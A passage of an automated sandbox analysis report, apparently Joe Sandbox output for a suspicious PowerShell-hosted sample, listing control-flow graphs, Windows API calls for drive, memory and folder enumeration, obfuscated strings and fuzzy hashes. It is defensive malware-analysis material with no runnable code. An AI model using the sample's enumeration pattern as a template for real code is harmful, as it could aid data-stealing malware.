                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$9$g$l$z
                                                                                        • API String ID: 0-269890479
                                                                                        • Opcode ID: a353640b3a3af9cd032289f111d3e93a56083f190321021733db77fac054ba16
                                                                                        • Instruction ID: 22b7f936e929c51deea6fb5deb574b77d4f8fc6dd82b2f107a240a829685dc28
                                                                                        • Opcode Fuzzy Hash: a353640b3a3af9cd032289f111d3e93a56083f190321021733db77fac054ba16
                                                                                        • Instruction Fuzzy Hash: BA62717160D7808BD364DB38C8953AFBFD2ABD5324F198E2EE5D9873D1DA3885458B02

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 793 4f8640-4f8651 call 52abc0 796 4f8927-4f8929 ExitProcess 793->796 797 4f8657-4f865e call 5240a0 793->797 800 4f8664-4f868d GetCurrentProcessId GetCurrentThreadId 797->800 801 4f8910-4f8917 797->801 802 4f868f-4f8694 800->802 803 4f8696-4f872f SHGetSpecialFolderPathW 800->803 804 4f8919-4f891f call 4f7fc0 801->804 805 4f8922 call 52b3e0 801->805 802->803 806 4f8730-4f877d 803->806 804->805 805->796 806->806 809 4f877f-4f87b9 call 529a70 806->809 813 4f87c0-4f87dc 809->813 814 4f87de-4f87f4 813->814 815 4f87f6-4f880b GetForegroundWindow 813->815 814->813 816 4f88ec-4f8904 call 4f9ad0 815->816 817 4f8811-4f88ea 815->817 816->801 820 4f8906 call 4fc7c0 816->820 817->816 822 4f890b call 4fb5e0 820->822 822->801
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004F8664
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004F866E
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004F86C9
                                                                                        • GetForegroundWindow.USER32 ref: 004F8803
                                                                                        • ExitProcess.KERNEL32 ref: 004F8929
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                        • String ID: (i
                                                                                        • API String ID: 4063528623-310932114
                                                                                        • Opcode ID: 51bccfa34b6c20ec21e2c3a7b8d1854d5c9e0c8315ce43fb5de5f1ef9c0045dc
                                                                                        • Instruction ID: 2eeb98cea0e5be074a98d739268cf2c95de03316251b704a219c19b09e6403e2
                                                                                        • Opcode Fuzzy Hash: 51bccfa34b6c20ec21e2c3a7b8d1854d5c9e0c8315ce43fb5de5f1ef9c0045dc
                                                                                        • Instruction Fuzzy Hash: 4A718AB3B443044BD308AF69DC8536ABAD3ABC5310F0DD53EA598CB391EA7CD8049645

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 824 51b744-51b763 825 51b770-51b810 824->825 825->825 826 51b816-51b81d 825->826 827 51b83b-51bac5 826->827 828 51b81f-51b823 826->828 831 51bad0-51bb06 827->831 829 51b830-51b839 828->829 829->827 829->829 831->831 832 51bb08-51bb0f 831->832 833 51bb11-51bb15 832->833 834 51bb2b-51bb37 832->834 835 51bb20-51bb29 833->835 836 51bb51-51bb75 call 52d140 834->836 837 51bb39-51bb3b 834->837 835->834 835->835 841 51bb7a-51bbab GetPhysicallyInstalledSystemMemory 836->841 838 51bb40-51bb4d 837->838 838->838 840 51bb4f 838->840 840->836 842 51bbb0-51bbdd 841->842 842->842 843 51bbdf-51bc1f call 50d080 842->843 846 51bc20-51bc52 843->846 846->846 847 51bc54-51bc5b 846->847 848 51bc7d 847->848 849 51bc5d-51bc64 847->849 850 51bc80-51bc88 848->850 851 51bc70-51bc79 849->851 853 51bc9b-51bca8 850->853 854 51bc8a-51bc8b 850->854 851->851 852 51bc7b 851->852 852->850 856 51bccb-51bd1f 853->856 857 51bcaa-51bcb1 853->857 855 51bc90-51bc99 854->855 855->853 855->855 859 51bd20-51bde1 856->859 858 51bcc0-51bcc9 857->858 858->856 858->858 859->859 860 51bde7-51bdee 859->860 861 51bdf0-51bdf4 860->861 862 51be0b-51be18 860->862 863 51be00-51be09 861->863 864 51be3b-51bed8 862->864 865 51be1a-51be21 862->865 863->862 863->863 866 51bee0 864->866 867 51be30-51be39 865->867 866->866 867->864 867->867
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$'$)I5|$Ju)y
                                                                                        • API String ID: 0-2458968036
                                                                                        • Opcode ID: ceb9aa8c118d296bd35d0ee2ab650c49ec5c49e944e9e5b9047e8011d6b2efbe
                                                                                        • Instruction ID: 73236d77f37ce734bd18b82b42c92425ef32accefae35ecc1a480cb27984b0f9
                                                                                        • Opcode Fuzzy Hash: ceb9aa8c118d296bd35d0ee2ab650c49ec5c49e944e9e5b9047e8011d6b2efbe
                                                                                        • Instruction Fuzzy Hash: B5D1F671A1C3918BE729CF39C8913EBBFD1AFAA304F18896DD4C997291D7348905CB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 868 51ba95-51bac5 call 5212f0 call 4f7fc0 874 51bad0-51bb06 868->874 874->874 875 51bb08-51bb0f 874->875 876 51bb11-51bb15 875->876 877 51bb2b-51bb37 875->877 878 51bb20-51bb29 876->878 879 51bb51-51bbab call 52d140 GetPhysicallyInstalledSystemMemory 877->879 880 51bb39-51bb3b 877->880 878->877 878->878 885 51bbb0-51bbdd 879->885 881 51bb40-51bb4d 880->881 881->881 883 51bb4f 881->883 883->879 885->885 886 51bbdf-51bc1f call 50d080 885->886 889 51bc20-51bc52 886->889 889->889 890 51bc54-51bc5b 889->890 891 51bc7d 890->891 892 51bc5d-51bc64 890->892 893 51bc80-51bc88 891->893 894 51bc70-51bc79 892->894 896 51bc9b-51bca8 893->896 897 51bc8a-51bc8b 893->897 894->894 895 51bc7b 894->895 895->893 899 51bccb-51bd1f 896->899 900 51bcaa-51bcb1 896->900 898 51bc90-51bc99 897->898 898->896 898->898 902 51bd20-51bde1 899->902 901 51bcc0-51bcc9 900->901 901->899 901->901 902->902 903 51bde7-51bdee 902->903 904 51bdf0-51bdf4 903->904 905 51be0b-51be18 903->905 906 51be00-51be09 904->906 907 51be3b-51bed8 905->907 908 51be1a-51be21 905->908 906->905 906->906 909 51bee0 907->909 910 51be30-51be39 908->910 909->909 910->907 910->910
                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0051BB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: #$'$)I5|$Ju)y
                                                                                        • API String ID: 3960555810-2458968036
                                                                                        • Opcode ID: 740988690191e2436073ede454a99baee4775620c037a228ccf1044c86963d33
                                                                                        • Instruction ID: 15f380518f87a852a6d8471f5dd2ee1220ac62cfff9743c211009dd07cdab4e9
                                                                                        • Opcode Fuzzy Hash: 740988690191e2436073ede454a99baee4775620c037a228ccf1044c86963d33
                                                                                        • Instruction Fuzzy Hash: 8AB1D47161C3818BE729CF39C8A07EBBFD1AFAA304F18496DD4C997292D7358905CB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 911 5123b0-512406 912 512410-51242a 911->912 912->912 913 51242c-51246b RtlExpandEnvironmentStrings 912->913 914 512470-5124be 913->914 914->914 915 5124c0-5124ca 914->915 916 5124d1-5124d7 915->916 917 512640-51264d 915->917 918 512630-512637 915->918 919 512514-51251a call 4f7fc0 915->919 920 51252a-512533 915->920 921 51251d-512529 915->921 922 51250c 915->922 925 5124e0 916->925 926 5124d9-5124de 916->926 923 512656 917->923 924 51264f-512654 917->924 918->917 919->921 928 512535-51253a 920->928 929 51253c 920->929 922->919 931 51265d-512704 call 4f7fb0 923->931 924->931 932 5124e3-512505 call 4f7fb0 RtlExpandEnvironmentStrings 925->932 926->932 930 512543-512577 call 4f7fb0 928->930 929->930 940 512580-5125b8 930->940 941 512710-512736 931->941 932->917 932->918 932->919 932->920 932->921 932->922 940->940 942 5125ba-5125c3 940->942 941->941 943 512738-512744 941->943 944 5125e1-5125ef 942->944 945 5125c5-5125ca 942->945 946 512761-51276d 943->946 947 512746-51274f 943->947 949 512611-51261c call 52e780 944->949 950 5125f1-5125f5 944->950 948 5125d0-5125df 945->948 952 512791-5127b1 GetLogicalDrives call 52e780 946->952 953 51276f-512773 946->953 951 512750-51275f 947->951 948->944 948->948 958 512621-512629 949->958 954 512600-51260f 950->954 951->946 951->951 960 5127d0-5127ea 952->960 961 512910-51292a 952->961 962 512a52-512a5b call 4f7fc0 952->962 963 512a75-512a7b call 4f7fc0 952->963 964 512a65 952->964 965 5127b8-5127c2 952->965 966 512a6b 952->966 967 5127ca 952->967 968 512a4c 952->968 956 512780-51278f 953->956 954->949 954->954 956->952 956->956 958->917 958->918 969 5127f0-51282f 960->969 971 512930-51296f 961->971 962->964 964->966 965->967 966->963 967->960 968->962 969->969 973 512831-5128b4 969->973 971->971 975 512971-5129f4 971->975 977 5128c0-5128e3 973->977 978 512a00-512a23 975->978 977->977 979 5128e5-512904 call 5100a0 977->979 978->978 980 512a25-512a44 call 5100a0 978->980 979->961 980->968
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0051245E
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 005124FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: gd
                                                                                        • API String ID: 237503144-565856990
                                                                                        • Opcode ID: 4857ec9e1ecc941e0a526a55b76d8b5f7216d50d17141728e63db6e0e0f6c3d6
                                                                                        • Instruction ID: 734f28ccc05520b3f43fe5e4ceb1da046521c1c11372de1293860e45e4f1e18f
                                                                                        • Opcode Fuzzy Hash: 4857ec9e1ecc941e0a526a55b76d8b5f7216d50d17141728e63db6e0e0f6c3d6
                                                                                        • Instruction Fuzzy Hash: 9FF11FB15083408FE718DF69D89166BBBE1FFA5304F14892CF5C68B381E7789949CB86

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 985 508592-5085d4 986 5085e0-50860a 985->986 986->986 987 50860c-50862c call 4f1df0 986->987 990 5089f0 987->990 991 5089f2-5089f9 987->991 992 508633-508661 987->992 993 508993-50899f call 4f7fc0 987->993 994 508936-50895e call 50b7e0 987->994 995 508718-50873b 987->995 996 508980-508984 987->996 997 508740-50874e 987->997 998 5089a0-5089a6 call 4f7fc0 987->998 999 5088e3-508903 987->999 1000 508766-50877c call 4f1e30 987->1000 1001 508968-508975 call 4f7fc0 987->1001 1002 50890a-508915 987->1002 1003 50898d 987->1003 1004 5089af-5089ba 987->1004 1008 508670-50869c 992->1008 993->998 994->1001 1011 50874f-50875f call 4f1e20 995->1011 996->1003 997->1011 998->1004 999->990 999->991 999->993 999->994 999->996 999->997 999->998 999->1001 999->1002 999->1003 1027 5087f0 1000->1027 1028 50877e-508781 1000->1028 1001->996 1013 508931 1002->1013 1014 508917-50891f 1002->1014 1003->993 1010 5089d8-5089ef call 4f1f90 1004->1010 1008->1008 1015 50869e-508708 call 50b7e0 1008->1015 1010->990 1011->990 1011->991 1011->993 1011->994 1011->996 1011->997 1011->998 1011->999 1011->1000 1011->1001 1011->1002 1011->1003 1011->1004 1013->994 1023 508920-50892f 1014->1023 1036 5089bc 1015->1036 1037 50870e-508713 1015->1037 1023->1013 1023->1023 1030 5087f2-5087f5 1027->1030 1031 508799-5087aa 1028->1031 1034 508800 1030->1034 1035 5087f7-5087fc 1030->1035 1032 508790 1031->1032 1033 5087ac-5087ba 1031->1033 1038 508791-508797 1032->1038 1033->1032 1039 5087bc-5087ce 1033->1039 1041 508807-50884f call 4f7fb0 call 4fa610 1034->1041 1035->1041 1040 5089bf-5089d5 1036->1040 1037->1040 1038->1030 1038->1031 1039->1032 1042 5087d0-5087dc 1039->1042 1040->1010 1048 508860-508862 1041->1048 1049 508851-508859 1041->1049 1042->1038 1044 5087de-5087e1 1042->1044 1044->1038 1050 508865-508879 call 4f7fb0 1048->1050 1049->1050 1053 508891-50889f 1050->1053 1054 50887b-50887e 1050->1054 1056 5088c1-5088cf call 52e780 1053->1056 1057 5088a1-5088a6 1053->1057 1055 508880-50888f 1054->1055 1055->1053 1055->1055 1060 5088d4-5088dc 1056->1060 1058 5088b0-5088bf 1057->1058 1058->1056 1058->1058 1060->990 1060->991 1060->993 1060->994 1060->996 1060->997 1060->998 1060->999 1060->1001 1060->1002 1060->1003
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !+$8,%/$<6>r$>%:'$W
                                                                                        • API String ID: 0-3126514706
                                                                                        • Opcode ID: 5338923224796c9b9284561d234598230bd40dbe0be85eebcc11c192b4b19bb3
                                                                                        • Instruction ID: c45c11d25421256490c5aa63d4b7add1453a9e2dbd95041ec1d998294bbd2043
                                                                                        • Opcode Fuzzy Hash: 5338923224796c9b9284561d234598230bd40dbe0be85eebcc11c192b4b19bb3
                                                                                        • Instruction Fuzzy Hash: 01B127B2A083409BD7248F24C8527BFBBA1FF95314F18892DE8CA87391EB359915C756

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1116 4fade9-4fae6f 1117 4fae70-4fae78 1116->1117 1117->1117 1118 4fae7a-4fae9e 1117->1118 1120 4faeb9-4fb095 1118->1120 1121 4fb109-4fb143 call 4f7e90 1118->1121 1122 4faea5-4faeaa 1118->1122 1123 4faeb2-4faeb4 1118->1123 1124 4faeb0 1118->1124 1125 4fb100-4fb104 1118->1125 1127 4fb0a0-4fb0e2 1120->1127 1128 4fb44d-4fb459 1121->1128 1122->1124 1126 4fb45c-4fb463 1123->1126 1124->1123 1125->1128 1127->1127 1130 4fb0e4-4fb0ec 1127->1130 1128->1126 1132 4fb0f0-4fb0f9 1130->1132 1132->1121 1132->1125
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$<"$=:
                                                                                        • API String ID: 0-3239783174
                                                                                        • Opcode ID: ff15188a947fbd8df178f22e07721fd691de8b26673217a90ce26f84b0b05013
                                                                                        • Instruction ID: 614baffe267b8b945144e16b62ced3c6b819ed23755f6e36841fef4a71e84243
                                                                                        • Opcode Fuzzy Hash: ff15188a947fbd8df178f22e07721fd691de8b26673217a90ce26f84b0b05013
                                                                                        • Instruction Fuzzy Hash: 989181B4A05B42DFD3158F25C991381BFB1FF12310F05879AC5698BA92D738B429CF95
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: 9.$9.
                                                                                        • API String ID: 2994545307-2940951921
                                                                                        • Opcode ID: c3cdf1bb0814f6a68f1ac4146fdbfcf17824d856eb0dd4e2edf30a9bc060accc
                                                                                        • Instruction ID: f3fbf891ed50f3dd6c296ff3571390d18233ad3ce929bb75309a9b074d1b907c
                                                                                        • Opcode Fuzzy Hash: c3cdf1bb0814f6a68f1ac4146fdbfcf17824d856eb0dd4e2edf30a9bc060accc
                                                                                        • Instruction Fuzzy Hash: 8B418971E056299BE728CB28FC817253FA2FF96300F68861CE441EB3E5D7705C458780
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da53c1bc580bc9baa9c962ef02e8f831e4cb51caab72a5ea471b13b5a451a25b
                                                                                        • Instruction ID: 3fa0f06c2053e17e1d021ab96033e13451547e17852454a8da88b20b3619b433
                                                                                        • Opcode Fuzzy Hash: da53c1bc580bc9baa9c962ef02e8f831e4cb51caab72a5ea471b13b5a451a25b
                                                                                        • Instruction Fuzzy Hash: 1481F1B25082418FD724CF28C852A7FBBE1BFA6304F18492DE4D98B392EB35D945C752
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(0052E5CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0052B48E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,004F8796,8B8A7A00), ref: 00529A80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 258b0de212610a8d32b17e5fbe0e95d5c0080e2fc9b19a3281e102117582087a
                                                                                        • Instruction ID: 8fd42ed8599e04b533e031ae8c3313ed6eacfe8d180408f833539488cec60121
                                                                                        • Opcode Fuzzy Hash: 258b0de212610a8d32b17e5fbe0e95d5c0080e2fc9b19a3281e102117582087a
                                                                                        • Instruction Fuzzy Hash: 45C01230884120AFC6045F00DC08F6ABFB8AF5B242F002028A009732B2C620B808DA88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: @
                                                                                        • API String ID: 2994545307-2766056989
                                                                                        • Opcode ID: d1c9ec17f3d743a4b00d8d9c8d2fd0a41a0ae2b5a0687f146391ba3652799685
                                                                                        • Instruction ID: 98f8d2699502cecef28f7700a749ea7b2e9d63d2eb4ccfe9b7309eaede9546e3
                                                                                        • Opcode Fuzzy Hash: d1c9ec17f3d743a4b00d8d9c8d2fd0a41a0ae2b5a0687f146391ba3652799685
                                                                                        • Instruction Fuzzy Hash: 6D4113B29043218BD714CF28E84662BBBE2FFD6328F19855CE8D55B3D1E734990587D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: >?
                                                                                        • API String ID: 0-3061458111
                                                                                        • Opcode ID: e7acb1882e39fdbf24c8dd0c1f4ee1a6c7fcb25e922549a10f0af669d0ea3af6
                                                                                        • Instruction ID: 809c8b53e451d4e52fc25accaeaf8c746a9660a878cab6e8acef2e6efa1f5e6e
                                                                                        • Opcode Fuzzy Hash: e7acb1882e39fdbf24c8dd0c1f4ee1a6c7fcb25e922549a10f0af669d0ea3af6
                                                                                        • Instruction Fuzzy Hash: 8D113A386083408FC314CF1598946BBBBE2EBD6308F14562CE1D957381C775950ACB9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5bc0ff2a888850b7684aaa9d49ce1a478d472731bb509c5f55e7468ee733758b
                                                                                        • Instruction ID: df4b7c7ea6e06828b0d300f13fe6548aab7872ef27658aa7b27d4f7c8976e141
                                                                                        • Opcode Fuzzy Hash: 5bc0ff2a888850b7684aaa9d49ce1a478d472731bb509c5f55e7468ee733758b
                                                                                        • Instruction Fuzzy Hash: 6AB14B72A14714DBFB14CE2498826EB7B92FFD1314F59882DE8858B381F634DD46C392

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
